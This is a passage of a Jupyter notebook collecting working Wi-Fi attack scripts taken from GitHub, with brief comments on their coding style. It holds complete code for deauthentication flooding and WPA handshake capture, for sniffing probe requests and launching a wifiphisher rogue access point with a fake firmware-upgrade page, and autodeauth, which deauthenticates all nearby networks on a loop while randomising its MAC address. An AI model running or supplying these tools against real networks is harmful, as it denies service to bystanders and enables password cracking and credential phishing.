"interface = Prompt.ask(\"Select an [bold][cyan]interface[/cyan][/bold]\",choices=addrs,default=addrs[-1])\n",
"\n",
"print(f\"[bright_black]Sniffing in [underline]{interface}[/underline] until CTRL-C[/bright_black]...\")\n",
"\n",
"ap_list = []\n",
"ap_info_list = []\n",
"\n",
"def handlePackets(pkt):\n",
" global ap_list\n",
" global ap_info_list\n",
" if pkt.haslayer(Dot11Beacon):\n",
" if pkt.addr2 not in ap_list: \n",
" ap_list.append(pkt.addr2)\n",
" wifi_name = pkt.info.decode()\n",
" wifi_mac = pkt.addr2\n",
" sec_info = pkt[Dot11Beacon].getlayer(Dot11Beacon).cap\n",
" try:\n",
" netstats = pkt[Dot11Beacon].network_stats()\n",
" channel = netstats['channel']\n",
" enctype = str('/'.join(netstats['crypto'])).replace(\"OPN\",\"[bold][red]OPEN[/red][/bold]\").replace(\"WEP\",\"[bold][yellow]WEP[/yellow][/bold]\")\n",
" except:\n",
" channel = \"unknown\"\n",
" enctype = \"unknown\"\n",
" rssi = pkt.dBm_AntSignal if hasattr(pkt, 'dBm_AntSignal') else \"unknown\"\n",
" ap_info_list.append([wifi_name,wifi_mac,enctype,str(rssi),str(channel)])\n",
" print(f\"[bright_black]+[/bright_black] Found [green]{wifi_name}[/green] ([cyan]{wifi_mac}[/cyan])\")\n",
"\n",
"chthread = True\n",
"stopped = False\n",
"\n",
"def channel_thread(interf):\n",
" global chthread\n",
" global stopped\n",
" while chthread:\n",
" for x in range(1,14):\n",
" os.popen(f\"iwconfig {interf} channel {x}\").read()\n",
" time.sleep(0.3)\n",
" print(f\"\\n[bright_black]Stopped hopping channels on [underline]{interf}[/underline][/bright_black]\")\n",
" stopped = True\n",
"\n",
"total_packets = 0\n",
"\n",
"def deauthenticate_wifi_network(target_mac,channel,interf,attackmode):\n",
" global total_packets\n",
"\n",
" os.popen(f\"iwconfig {interf} channel {channel}\").read()\n",
" pkt = RadioTap() / Dot11(type=0, subtype=12, addr1=\"ff:ff:ff:ff:ff:ff\", addr2=target_mac, addr3=target_mac) / Dot11Deauth()\n",
" if attackmode:\n",
" while True:\n",
" sendp(pkt, iface=interf, verbose=0)\n",
" print(f\"[bright_black]Sent [underline]{total_packets}[/underline] packets to {target_mac}[/bright_black]\",end=\"\\r\")\n",
" total_packets += 1\n",
" else:\n",
" for x in range(100):\n",
" sendp(pkt, iface=interf, verbose=0)\n",
"\n",
"handshake_fragments = 0\n",
"\n",
"def sniffuntil(pkt):\n",
" global handshake_fragments\n",
"\n",
" pktdmp = PcapWriter(\"handshake.pcap\",append=True,sync=True)\n",
" pktdmp.write(pkt)\n",
"\n",
" if EAPOL in pkt:\n",
" handshake_fragments += 1\n",
" print(f\"[bright_black]+[/bright_black] Captured [green][underline]{handshake_fragments}[/underline][/green] EAPOL packets\")\n",
"\n",
" if handshake_fragments >= 10:\n",
" return True\n",
"\n",
"\n",
"def intercept_handshakes(interf):\n",
" sniff(stop_filter=sniffuntil, iface=interf, monitor=True)\n",
"\n",
"\n",
"Thread(target=channel_thread,args=(interface,)).start()\n",
" \n",
"sniff(iface=interface, prn=handlePackets)\n",
"\n",
"print(\"\\n[bright_black]Showing results[/bright_black]...\")\n",
"\n",
"table = Table(box=box.SIMPLE_HEAD)\n",
"\n",
"table.add_column(\"N.\", justify=\"left\", style=\"bright_black\")\n",
"table.add_column(\"SSID\", justify=\"center\", style=\"cyan\")\n",
"table.add_column(\"BSSID\", justify=\"center\", style=\"green\")\n",
"table.add_column(\"ENC\", justify=\"center\", style=\"white\")\n",
"table.add_column(\"RSSI\", justify=\"center\", style=\"magenta\")\n",
"table.add_column(\"CHANNEL\", justify=\"center\", style=\"blue\")\n",
"\n",
"c = 0\n",
"for x in ap_info_list:\n",
" c+=1\n",
" table.add_row(f\"[bold]{c}[/bold]\", x[0], x[1], x[2], x[3], x[4])\n",
"\n",
"console = Console()\n",
"console.print(table)\n",
"\n",
"chthread = False\n",
"while True:\n",
" if stopped:\n",
" break\n",
"\n",
"indx = int(Prompt.ask(\"Insert [bold][bright_black]N.[/bold][/bright_black]\",default=\"1\"))-1\n",
"target = ap_list[indx]\n",
"chan = ap_info_list[indx][-1]\n",
"print(f\"\\n[bright_black]Attacking {target} on channel {chan}[/bright_black]...\")\n",
"\n",
"mode = Prompt.ask(\"Select attack mode\",choices=[\"handshake_steal\",\"deauth_attack\"],default=\"deauth_attack\")\n",
"\n",
"print(\"\")\n",
"Thread(target=deauthenticate_wifi_network,args=(target,chan,interface,mode == \"deauth_attack\",)).start()\n",
"\n",
"if mode == \"handshake_steal\":\n",
" print(f\"[bright_black]Intercepting handshakes[/bright_black]...\")\n",
" intercept_handshakes(interface)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Example #5 - Custom Wifi Listener\n",
"\n",
"From: https://github.com/EnriqueITE/customWifiListening\n",
"\n",
"Originally intended as a pre-emptive wifi scanner for attack vector facilitating wififisher. The code was unique and straightforward enough for inclusion in this notebook."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"#!/usr/bin/env python\n",
"# -*- coding: utf-8 -*-?\n",
"import os, time, socket, fcntl, struct\n",
"from subprocess import call\n",
"from platform import system\n",
"import threading, os, time\n",
"from threading import Thread, Lock\n",
"from subprocess import Popen, PIPE\n",
"from signal import SIGINT, signal\n",
"from scapy.all import *\n",
"import os, ConfigParser\n",
"from subprocess import Popen, PIPE\n",
"\n",
"# Author: Enrique Serrano ( @EnriqueITE | hello@enriqueite.com )\n",
"# define variables\n",
"intfparent='wlan1'\n",
"intfmon='mon0'\n",
"channel='' ### Define channel if not want to hop, and will stay in one channel\n",
"first_pass=1\n",
"lock = Lock()\n",
"DN = open(os.devnull, 'w')\n",
"verbose=0\n",
"probes = list() ## list to add station probes\n",
"os.system(\"clear\")\n",
"enum = 0\n",
"\n",
"\n",
"print \"\"\" \n",
"???? ??????? ??????? ?????????? ??????? ??? ??? ?????? ?????????? ?????????????????? \n",
"????? ???????? ???????? ???????????????????? ??? ?????????????????????? ????????????????????\n",
"?????????????? ????????? ?????? ?????? ??? ??????????????????? ??????? ?????? ????????\n",
"?????????????? ???????????????? ?????? ??? ??????????????????? ??????? ?????? ????????\n",
"??? ??? ??????????????? ??????????????????????? ??? ?????? ?????????????? ?????????????? ???\n",
"??? ??? ??????? ??? ???????????? ??????? ??? ?????? ??? ?????????? ?????????????? ???\n",
"\"\"\"\n",
"print \" Devices - WiFi Networks\"\n",
"print \"-------------------\t ------------------------\"\n",
"\n",
"\n",
"def OScheck():\n",
" osversion = system()\n",
"# print \"Operating System: %s\" %osversion\n",
" if osversion != 'Linux':\n",
" print \"This script only works on Linux OS! Exitting!\"\n",
" exit(1)\n",
"\n",
"def InitMon():\n",
"\tif not os.path.isdir(\"/sys/class/net/\" + intfmon):\n",
"\t\tif not os.path.isdir(\"/sys/class/net/\" + intfparent):\n",
"\t\t\tprint \"WiFi interface %s does not exist! Cannot continue!\" %(intfparent)\n",
"\t\t\texit(1)\n",
"\t\telse:\n",
"\t\t\ttry:\n",
"\t\t\t\t# create monitor interface using iw\n",
"\t\t\t\tos.system(\"iw dev %s interface add %s type monitor\" % (intfparent, intfmon))\n",
"\t\t\t\ttime.sleep(0.5)\n",
"\t\t\t\tos.system(\"ifconfig %s up\" %intfmon)\n",
" \t\t\t\t#print \"Creating monitor VAP %s for parent %s...\" %(intfmon,intfparent)\n",
"\t\t\texcept OSError as e:\n",
"\t\t\t\tprint \"Could not create monitor %s\" %intfmon\n",
"\t\t\t\tos.kill(os.getpid(),SIGINT)\n",
"\t\t\t\tsys.exit(1)\n",
" \telse:\n",
" \t\tif verbose: print \"Monitor %s exists! Nothing to do, just continuing...\" %(intfmon)\n",
"\n",
"def GetMAC(iface):\n",
" s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n",
" info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', iface[:15]))\n",
" macaddr = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]\n",
" return macaddr\n",
"\n",
"def PacketHandler(pkt) :\n",
"\tglobal enum\n",
"\tif pkt.haslayer(Dot11):\n",
"\t\tif pkt.type == 0 and pkt.subtype == 4: ## probe request\n",
"\t\t\tif pkt.info != '': ## broadcast probe request\n",
"\t\t\t\tif not pkt.info in probes:\n",
"\t\t\t\t\tprobes.append(pkt.info)\n",
"\t\t\t\t\tprint \"XX:XX:XX%s \t\t%s.) %s\" %(pkt.addr2.upper()[8:], enum, pkt.info)\n",
"\t\t\t\t\tenum += 1\t\n",
"def calc_freq(channel):\n",
" if channel == 14:\n",
" freq = 2484\n",
" else:\n",
" freq = 2407 + (channel * 5)\n",
" return str(freq)\n",
"\n",
"def channel_hop(channel=None):\n",
"\tglobal intfmon, first_pass\n",
"\tchannelNum=0\n",
"\terr = None\n",
"\twhile 1:\n",
"\t\tif channel:\n",
"\t\t\twith lock: monchannel = channel\n",
"\t\telse:\n",
"\t\t\tchannelNum +=1\n",
"\t\t\tif channelNum > 14: channelNum = 1\n",
"\t\t\twith lock: first_pass = 0\n",
"\t\t\twith lock: monchannel = str(channelNum)\n",
"\t\ttry:\n",
"\t\t\tproc = Popen(['iw', 'dev', intfmon, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)\n",
"\t\t\tif verbose: print \"Setting %s interface to channel: %s (%s MHz)\" %(intfmon, monchannel, calc_freq(int(monchannel)))\n",
"\t\texcept OSError:\n",
"\t\t\tprint 'Could not execute iw!'\n",
"\t\t\tos.kill(os.getpid(),SIGINT)\n",
"\t\t\tsys.exit(1)\n",
"\t\tfor line in proc.communicate()[1].split('\\n'):\n",
"\t\t\tif len(line) > 2: # iw dev shouldnt display output unless there's an error\n",
"\t\t\t\terr = 'Channel hopping failed: '+ line\n",
"\t\t\tif channel:\n",
"\t\t\t\ttime.sleep(.05)\n",
"\t\t\telse:\n",
"\t\t\t\tif first_pass == 1:\n",
"\t\t\t\t\ttime.sleep(1.5)\n",
"\t\tcontinue\n",
"\n",
"# Check if OS is linux:\n",
"OScheck()\n",
"\n",
"# Check for root privileges\n",
"if os.geteuid() != 0:\n",
"\texit(\"You need to be root to run this script!\")\n",
"# else:\n",
"# \tprint \"You are running this script as root!\"\n",
"\n",
"# Check if monitor device exists\n",
"InitMon()\n",
"\n",
"# Get intfmon actual MAC address\n",
"#macaddr=GetMAC(intfmon).upper()\n",
"#print \"Actual %s MAC Address: %s\" %(intfmon, macaddr)\n",
"\n",
"# Start channel hopping.\n",
"# args must be a tuple: a bare string is unpacked character by character,\n",
"# so channel '11' would have called channel_hop('1', '1').\n",
"hop = Thread(target=channel_hop, args=(channel,))\n",
"hop.daemon = True\n",
"hop.start()\n",
"\n",
"# Start sniffing with timeout\n",
"sniff(iface=intfmon, prn = PacketHandler, timeout=20)\n",
"if probes:\n",
"\taux = 1\n",
"\tprint \"\\nSelect a network to continue: \\n\"\n",
"\tfor i,j in enumerate(probes):\n",
"\t\tprint str(i) + \".) \" + j\n",
"\twhile aux:\n",
"\t\tnetwork = raw_input(\"\\n-> \")\n",
"\t\t# Reject non-numeric input instead of crashing, and reject negative\n",
"\t\t# numbers, which would otherwise index from the end of the list\n",
"\t\ttry:\n",
"\t\t\tchoice = int(network)\n",
"\t\texcept ValueError:\n",
"\t\t\tchoice = -1\n",
"\t\tif 0 <= choice < len(probes):\n",
"\t\t\taux = 0\n",
"\t\t\tssid = probes[choice]\n",
"\t\t\tprint \"\\nOk! Creating Rogue Ap...\\n\"\n",
"\t\t\t# The SSID was sniffed from probe requests, i.e. it is chosen by\n",
"\t\t\t# whoever is transmitting. Pass it as a single argv entry rather\n",
"\t\t\t# than through a shell so quotes, ';' or '$(...)' inside it cannot\n",
"\t\t\t# run commands as root.\n",
"\t\t\tPopen(['wifiphisher', '-nJ', '-e', ssid, '-T', 'firmware-upgrade']).wait()\n",
"\t\telse:\n",
"\t\t\tprint \"\\nWifi network doesn't exists, please select one included in the list.\"\n",
"else:\n",
"\tprint \"Wifi probes not found, please try later...\""
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Example #6 - autodeauth\n",
"\n",
"From: https://github.com/Drew-Alleman/autodeauth\n",
"\n",
"As is par for the course, this snippet is the bulk of the autodeauth script. It was written with the intention of being used with a Raspberry Pi, and uses scapy to perform deauth attacks. Drew's style of coding is something I have never seen before in Python scripts, and is on a level of its own. His style is very expressive and descriptive. While the heavily detailed and finely structured object-oriented method of programming is very robust and explanatory, it is difficult to read."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"#!/usr/bin/python3\n",
"\n",
"from multiprocessing import connection\n",
"import os\n",
"\n",
"if os.geteuid() != 0:\n",
" exit(\n",
" \"You need to have root privileges to run this script.\\nPlease try again, this time using 'sudo'. Exiting.\"\n",
" )\n",
"\n",
"import time, json, logging, sys\n",
"import argparse, subprocess, threading\n",
"\n",
"import wifi # Used to scan for local networks\n",
"\n",
"try:\n",
" import RPi.GPIO as GPIO # Used for GPI pin control\n",
"except (ImportError, RuntimeError):\n",
" pass\n",
"\n",
"from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth\n",
"from scapy.sendrecv import sendp\n",
"\n",
"LOG_DIR = \"/var/log/autodeauth/\"\n",
"\n",
"\n",
"\"\"\"Formats a string\n",
"\n",
"Keyword arguments:\n",
"string -- String to format\n",
"\n",
"Return\n",
"Formatted string or None if it could not be parsed\n",
"\"\"\"\n",
"format_string = (\n",
" lambda string: None if r\"\\x00\" in string or len(string) == 0 else string.strip()\n",
")\n",
"\"\"\"\n",
"Creates a directory to store the json file\n",
"\n",
"Keyword arguments:\n",
"ssid -- ssid to create loot directory for\n",
"\n",
"Return\n",
"the filepath for the network\n",
"\"\"\"\n",
"get_loot_file = lambda ssid: f\"{LOG_DIR}/loot/{ssid.replace(' ', '')}.json\"\n",
"\n",
"LOG_DIR = \"/var/log/autodeauth/\"\n",
"\n",
"\n",
"def save_dict_to_json_file(file_path: str, content: dict) -> bool:\n",
"    \"\"\"Saves a python dictionary to a json file\n",
"\n",
"    The file is overwritten on every call so it always holds exactly one JSON\n",
"    document; appending a second dump to the same file would leave it\n",
"    unparseable.\n",
"\n",
"    Keyword arguments:\n",
"    file_path -- File path to save the dictionary\n",
"    content -- Dictionary to save\n",
"\n",
"    Return\n",
"    False if the file was not saved or parsed\n",
"    \"\"\"\n",
"    try:\n",
"        # Serialize before opening the file so a non-serializable value\n",
"        # cannot leave a truncated, half-written file behind\n",
"        serialized = json.dumps(content, indent=4)\n",
"        with open(file_path, \"w\") as json_file:\n",
"            json_file.write(serialized)\n",
"        return True\n",
"    except (TypeError, ValueError, EnvironmentError):\n",
"        return False\n",
"\n",
"\n",
"class InterfaceManager:\n",
"    \"\"\"Wraps one wireless interface: mode switching, scanning and deauthing\n",
"\n",
"    self.mode holds the last mode this object successfully applied\n",
"    (\"monitor\", \"managed\", or None before any switch); self.monitor_mode\n",
"    mirrors it as a boolean.\n",
"    \"\"\"\n",
"\n",
"    def __eq__(self, intertfaceObject) -> bool:\n",
"        \"\"\"Two managers are equal when they wrap the same interface name\"\"\"\n",
"        try:\n",
"            return self.interface == intertfaceObject.interface\n",
"        except AttributeError:\n",
"            # The other object has no .interface attribute\n",
"            return False\n",
"\n",
"    def __bool__(self) -> bool:\n",
"        \"\"\"True while the interface exists in sysfs and stop() was not called\"\"\"\n",
"        return (\n",
"            # /sys/class/net/{self.interface}/operstate <-- is linux only\n",
"            os.path.exists(f\"/sys/class/net/{self.interface}/operstate\")\n",
"            and self.enabled\n",
"        )\n",
"\n",
"    def __init__(self, interface: str) -> None:\n",
"        \"\"\"\n",
"        Keyword arguments:\n",
"        interface -- name of the network interface to manage\n",
"        \"\"\"\n",
"        self.interface = interface\n",
"        self.enabled = True\n",
"        # Updated by set_mode_monitor / set_mode_managed on success\n",
"        self.mode = None\n",
"        self.monitor_mode = False\n",
"        self.create_logger()\n",
"\n",
"    def create_logger(self) -> None:\n",
"        \"\"\"\n",
"        Creates a logging object\n",
"        \"\"\"\n",
"        self.logger = logging.getLogger(\"interfaceManager\")\n",
"        self.logger.setLevel(logging.DEBUG)\n",
"        if self.logger.handlers:\n",
"            # getLogger() hands back the same logger for the same name, so\n",
"            # adding handlers again would print every message twice\n",
"            return\n",
"        formatter = logging.Formatter(\"%(asctime)s - %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n",
"        stream_handler = logging.StreamHandler(sys.stdout)\n",
"        stream_handler.setFormatter(formatter)\n",
"        file_handler = logging.FileHandler(f\"{LOG_DIR}/log\")\n",
"        file_handler.setFormatter(formatter)\n",
"        self.logger.addHandler(stream_handler)\n",
"        self.logger.addHandler(file_handler)\n",
"\n",
"    def get_local_networks(self) -> list:\n",
"        \"\"\"Scans for local networks\n",
"\n",
"        Return\n",
"        Networks whose ssid passes format_string; an empty list when nothing\n",
"        was found or the scan raised an InterfaceError\n",
"        \"\"\"\n",
"        try:\n",
"            # Leave monitor mode before asking wifi.Cell for a scan\n",
"            if self.mode == \"monitor\":\n",
"                self.set_mode_managed()\n",
"            networks = list(set(wifi.Cell.all(self.interface)))\n",
"            return [\n",
"                network\n",
"                for network in networks\n",
"                if format_string(network.ssid) is not None\n",
"            ]\n",
"\n",
"        except wifi.exceptions.InterfaceError:\n",
"            self.logger.error(\n",
"                f\"Restarting interface: {self.interface} an issue occurred\"\n",
"            )\n",
"            self.restart_network_adapter()\n",
"            # Keep the declared return type instead of falling through to None\n",
"            return []\n",
"\n",
"    def did_os_command_succeed(self, command: str) -> bool:\n",
"        \"\"\"Runs a command and returns true if it worked\n",
"\n",
"        Keyword arguments:\n",
"        command -- command to run\n",
"\n",
"        Return\n",
"        False if the command did not succeed\n",
"        \"\"\"\n",
"        # getstatusoutput returns (exit_code, output); 0 means success\n",
"        exit_code, _output = subprocess.getstatusoutput(command)\n",
"        return exit_code == 0\n",
"\n",
"\n",
"    def deauth_network(\n",
"        self,\n",
"        bssid_address: str,\n",
"        target_mac_address: str = \"ff:ff:ff:ff:ff:ff\",\n",
"        packet_count: int = 5000,\n",
"        frequency: int = 0,\n",
"        verbose: int = 0,\n",
"    ) -> bool:\n",
"        \"\"\"\n",
"        Sends deauth frames to a network, then returns the interface to managed mode\n",
"\n",
"        Keyword arguments:\n",
"        bssid_address -- MAC address of the router to deauth\n",
"        target_mac_address -- MAC address of the target device to deauth (default: ff:ff:ff:ff:ff:ff) (ALL)\n",
"        packet_count -- Amount of deauth frames to send default: 5000\n",
"        frequency -- Time between packets sending\n",
"        verbose -- Scapy verbosity\n",
"\n",
"        Return\n",
"        False if the interface could not be put into monitor mode\n",
"        \"\"\"\n",
"        if self.mode != \"monitor\" and not self.set_mode_monitor():\n",
"            return False\n",
"        dot11 = Dot11(\n",
"            addr1=target_mac_address, addr2=bssid_address, addr3=bssid_address\n",
"        )\n",
"        frame = RadioTap() / dot11 / Dot11Deauth()\n",
"        try:\n",
"            sendp(\n",
"                frame,\n",
"                iface=self.interface,\n",
"                count=packet_count,\n",
"                inter=frequency,\n",
"                verbose=verbose,\n",
"            )\n",
"        finally:\n",
"            # Restore managed mode even when sendp raises, so the next scan\n",
"            # does not start from a monitor-mode interface\n",
"            self.set_mode_managed()\n",
"        return True\n",
"\n",
"    def set_down(self) -> bool:\n",
"        \"\"\"Sets the primary adapter down\n",
"\n",
"        Return:\n",
"        True if the adapter was set down\n",
"        \"\"\"\n",
"        if not self.did_os_command_succeed(f\"sudo ifconfig {self.interface} down\"):\n",
"            self.logger.error(f\"Failed to set {self.interface} down\")\n",
"            return False\n",
"        time.sleep(2)\n",
"        return True\n",
"\n",
"    def set_up(self) -> bool:\n",
"        \"\"\"Sets the primary adapter up\n",
"\n",
"        Return:\n",
"        True if the adapter was set up\n",
"        \"\"\"\n",
"        if not self.did_os_command_succeed(f\"sudo ifconfig {self.interface} up\"):\n",
"            self.logger.error(f\"Failed to set {self.interface} up\")\n",
"            return False\n",
"        time.sleep(2)\n",
"        return True\n",
"\n",
"    def change_mac_address(self) -> bool:\n",
"        \"\"\"Randomizes the adapter MAC address with macchanger\n",
"\n",
"        Return:\n",
"        True if the address was changed and the adapter came back up\n",
"        \"\"\"\n",
"        if not self.set_down():\n",
"            return False\n",
"        if not self.did_os_command_succeed(f\"sudo macchanger -b -r {self.interface}\"):\n",
"            self.logger.error(\"Failed to change MAC address\")\n",
"            return False\n",
"        return self.set_up()\n",
"\n",
"    def restart_networking_service(self) -> bool:\n",
"        \"\"\"\n",
"        Attempts to restart the networking service and the network-manager service\n",
"\n",
"        Return:\n",
"        False only when both restart commands failed\n",
"        \"\"\"\n",
"        if not self.did_os_command_succeed(\n",
"            \"sudo service networking restart\"\n",
"        ) and not self.did_os_command_succeed(\"sudo service network-manager restart\"):\n",
"            # A Logger object is not callable; log through .error()\n",
"            self.logger.error(\"Failed to restart services: networking, and network-manager\")\n",
"            return False\n",
"        return True\n",
"\n",
"    def set_mode_monitor(self) -> bool:\n",
"        \"\"\"\n",
"        Sets the network interface into monitor mode\n",
"\n",
"        Return:\n",
"        True if every step (down, iwconfig, up) succeeded\n",
"        \"\"\"\n",
"        if not self.set_down():\n",
"            return False\n",
"        if not self.did_os_command_succeed(\n",
"            f\"sudo iwconfig {self.interface} mode monitor\"\n",
"        ):\n",
"            self.logger.error(f\"Failed to set {self.interface} to monitor mode\")\n",
"            return False\n",
"        if not self.set_up():\n",
"            return False\n",
"        # Record the mode that the self.mode checks in this class read\n",
"        self.mode = \"monitor\"\n",
"        self.monitor_mode = True\n",
"        return True\n",
"\n",
"    def set_mode_managed(self) -> bool:\n",
"        \"\"\"\n",
"        Sets the network interface into managed mode\n",
"\n",
"        Return:\n",
"        True if every step (down, iwconfig, up) succeeded\n",
"        \"\"\"\n",
"        if not self.set_down():\n",
"            return False\n",
"        if not self.did_os_command_succeed(\n",
"            f\"sudo iwconfig {self.interface} mode managed\"\n",
"        ):\n",
"            self.logger.error(f\"Failed to set {self.interface} to managed\")\n",
"            return False\n",
"        # Fail only when bringing the adapter up fails (check was inverted)\n",
"        if not self.set_up():\n",
"            return False\n",
"        self.mode = \"managed\"\n",
"        self.monitor_mode = False\n",
"        return True\n",
"\n",
"    def restart_network_adapter(self) -> bool:\n",
"        \"\"\"\n",
"        Restart the primary network adapter\n",
"        \"\"\"\n",
"        return self.set_down() and self.set_up()\n",
"\n",
"    def stop(self) -> None:\n",
"        \"\"\"\n",
"        Puts the interface back into managed mode and marks this manager disabled\n",
"        \"\"\"\n",
"        if self.mode != \"managed\":\n",
"            self.set_mode_managed()\n",
"        self.enabled = False\n",
"\n",
"\n",
"class AutoDeauth:\n",
"    def __init__(self, **kwargs) -> None:\n",
"        \"\"\"AutoDeauth\n",
"\n",
"        Keyword arguments:\n",
"        interface -- Interface to run the attack (must support packet injection)\n",
"        blacklist -- Networks to avoid\n",
"        whitelist -- Targets to only attack\n",
"        led -- GPIO pin used as LED indicator (falsy value disables the LED)\n",
"        time -- Time between two deauth frames\n",
"        count -- Amount of deauth frames to send per network\n",
"        random -- Randomize the MAC address before deauthing each network\n",
"        ignore -- Keep running when randomizing the MAC address fails\n",
"        verbose -- Scapy verbosity\n",
"        \"\"\"\n",
"        self.interface = kwargs.get(\"interface\")\n",
"        self.interface = InterfaceManager(self.interface)\n",
"        self.ssid_blacklist = kwargs.get(\"blacklist\")\n",
"        self.ssid_whitelist = kwargs.get(\"whitelist\")\n",
"        self.deauth_led = kwargs.get(\"led\")\n",
"        self.time = kwargs.get(\"time\")\n",
"        self.count = kwargs.get(\"count\")\n",
"        self.random = kwargs.get(\"random\")\n",
"        self.ignore = kwargs.get(\"ignore\")\n",
"        self.verbose = kwargs.get(\"verbose\")\n",
"        self.monitor_mode = False\n",
"        self.create_logger()\n",
"        if self.deauth_led:\n",
"            self.init_gpio_pins()\n",
"        self.blink_thread = None\n",
"        # blink_led loops while this is False\n",
"        self.is_done = True\n",
"\n",
"    def init_gpio_pins(self) -> None:\n",
"        \"\"\"\n",
"        Sets up the selected GPIO pin\n",
"        \"\"\"\n",
"        GPIO.setup(self.deauth_led, GPIO.OUT)\n",
"\n",
"    def blink_led(self) -> None:\n",
"        \"\"\"\n",
"        Thread that blinks the led when deauthing a network\n",
"        \"\"\"\n",
"        while not self.is_done:\n",
"            GPIO.output(self.deauth_led, GPIO.HIGH)\n",
"            time.sleep(0.2)\n",
"            GPIO.output(self.deauth_led, GPIO.LOW)\n",
"            time.sleep(0.2)\n",
"        GPIO.output(self.deauth_led, GPIO.LOW)\n",
"\n",
"    def create_logger(self) -> None:\n",
"        \"\"\"\n",
"        Creates a logging object\n",
"        \"\"\"\n",
"        self.logger = logging.getLogger(\"autodeauth\")\n",
"        self.logger.setLevel(logging.DEBUG)\n",
"        if self.logger.handlers:\n",
"            # getLogger() hands back the same logger for the same name, so\n",
"            # adding handlers again would print every message twice\n",
"            return\n",
"        formatter = logging.Formatter(\"%(asctime)s - %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n",
"        stream_handler = logging.StreamHandler(sys.stdout)\n",
"        stream_handler.setFormatter(formatter)\n",
"        file_handler = logging.FileHandler(f\"{LOG_DIR}/log\")\n",
"        file_handler.setFormatter(formatter)\n",
"        self.logger.addHandler(stream_handler)\n",
"        self.logger.addHandler(file_handler)\n",
"\n",
"    def save_information(self, network: wifi.Cell) -> bool:\n",
"        \"\"\"\n",
"        Saves the network object to a json file\n",
"\n",
"        Keyword arguments:\n",
"        network -- Network object to save\n",
"\n",
"        Return\n",
"        False if the file could not be saved\n",
"        \"\"\"\n",
"        file_path = get_loot_file(network.ssid)\n",
"        json_obj = {\n",
"            \"ssid\": network.ssid,\n",
"            \"mac_address\": network.address,\n",
"            \"channel\": network.channel,\n",
"            # NOTE(review): key is \"network.frequency\" unlike its plain-named\n",
"            # siblings; left as-is because existing loot files use it\n",
"            \"network.frequency\": network.frequency,\n",
"            \"mode\": network.mode,\n",
"            \"bitrates\": network.bitrates,\n",
"            \"encryption_type\": network.encryption_type,\n",
"            \"encrypted\": network.encrypted,\n",
"            \"quality\": network.quality,\n",
"            \"signal\": network.signal,\n",
"        }\n",
"        if save_dict_to_json_file(file_path, json_obj):\n",
"            return True\n",
"        self.logger.error(f\"Failed to save {network.ssid} to {file_path}\")\n",
"        # Honour the documented bool contract instead of returning None\n",
"        return False\n",
"\n",
"    def get_filtered_networks(self) -> list:\n",
"        \"\"\"\n",
"        Scans for networks and applies the blacklist / whitelist\n",
"\n",
"        Every network that passes the filters is also written to its loot file.\n",
"\n",
"        Return\n",
"        List of networks to attack (empty when none were found)\n",
"        \"\"\"\n",
"        try:\n",
"            networks = self.interface.get_local_networks()\n",
"            filtered_networks = []\n",
"            if not networks:\n",
"                return []\n",
"            for network in networks:\n",
"                ssid = format_string(network.ssid)\n",
"                # Skip unparseable ssids and anything blacklisted by ssid or MAC\n",
"                if not ssid or (\n",
"                    self.ssid_blacklist\n",
"                    and (\n",
"                        network.address in self.ssid_blacklist\n",
"                        or ssid in self.ssid_blacklist\n",
"                    )\n",
"                ):\n",
"                    continue\n",
"                # No whitelist means everything is a target; otherwise the\n",
"                # ssid or the MAC has to be listed\n",
"                if (\n",
"                    not self.ssid_whitelist\n",
"                    or ssid in self.ssid_whitelist\n",
"                    or network.address in self.ssid_whitelist\n",
"                ):\n",
"                    self.save_information(network)\n",
"                    filtered_networks.append(network)\n",
"            return filtered_networks\n",
"        except (KeyboardInterrupt):\n",
"            self.stop()\n",
"\n",
"    def start(self) -> None:\n",
"        \"\"\"\n",
"        Main loop: scan, then deauth every filtered network, until interrupted\n",
"        \"\"\"\n",
"        if not self.interface:\n",
"            self.logger.error(\n",
"                f\"Failed to start {self.interface.interface} is not a valid interface!\"\n",
"            )\n",
"            self.stop()\n",
"        while True:\n",
"            try:\n",
"                networks = self.get_filtered_networks()\n",
"                for network in networks:\n",
"                    self.logger.info(\n",
"                        f\"Sending {self.count} deauth frames to network: {network.address} -- {network.ssid}\"\n",
"                    )\n",
"\n",
"                    if self.deauth_led:\n",
"                        self.is_done = False\n",
"                        self.blink_thread = threading.Thread(target=self.blink_led)\n",
"                        self.blink_thread.start()\n",
"\n",
"                    try:\n",
"                        if self.random:\n",
"                            if not self.interface.change_mac_address() and not self.ignore:\n",
"                                self.logger.error(\"Failed to change MAC address\")\n",
"                                self.stop()\n",
"\n",
"                        if not self.interface.deauth_network(\n",
"                            network.address,\n",
"                            packet_count=self.count,\n",
"                            frequency=self.time,\n",
"                            verbose=self.verbose,\n",
"                        ):\n",
"                            self.logger.error(\n",
"                                f\"Failed to deauth {network.address} -- {network.ssid}\"\n",
"                            )\n",
"                    finally:\n",
"                        # Always stop the blink thread, also when the attack\n",
"                        # raised; otherwise it keeps blinking and the next\n",
"                        # network starts a second thread on top of it\n",
"                        self.is_done = True\n",
"                        if self.deauth_led and self.blink_thread:\n",
"                            self.blink_thread.join()\n",
"            except OSError as e: \n",
"                self.logger.warning(f\"{e} Reducing packet count to {1000}\")\n",
"                self.count = 1000\n",
"            except (KeyboardInterrupt):\n",
"                self.stop()\n",
"\n",
"    def stop(self) -> None:\n",
"        \"\"\"\n",
"        Stops the interface manager and the LED thread, then exits the process\n",
"        \"\"\"\n",
"        self.logger.info(\"Exiting/Cleaning up\")\n",
"        if self.interface:\n",
"            self.interface.stop()\n",
"        if self.deauth_led and self.blink_thread:\n",
"            self.is_done = True\n",
"            self.blink_thread.join()\n",
"        if self.deauth_led:\n",
"            GPIO.cleanup()\n",
"        exit()\n",
"\n",
"\n",
"if __name__ == \"__main__\":\n",
" print(\n",
" \"\"\"\n",
" _ _ ___ _ _ \n",
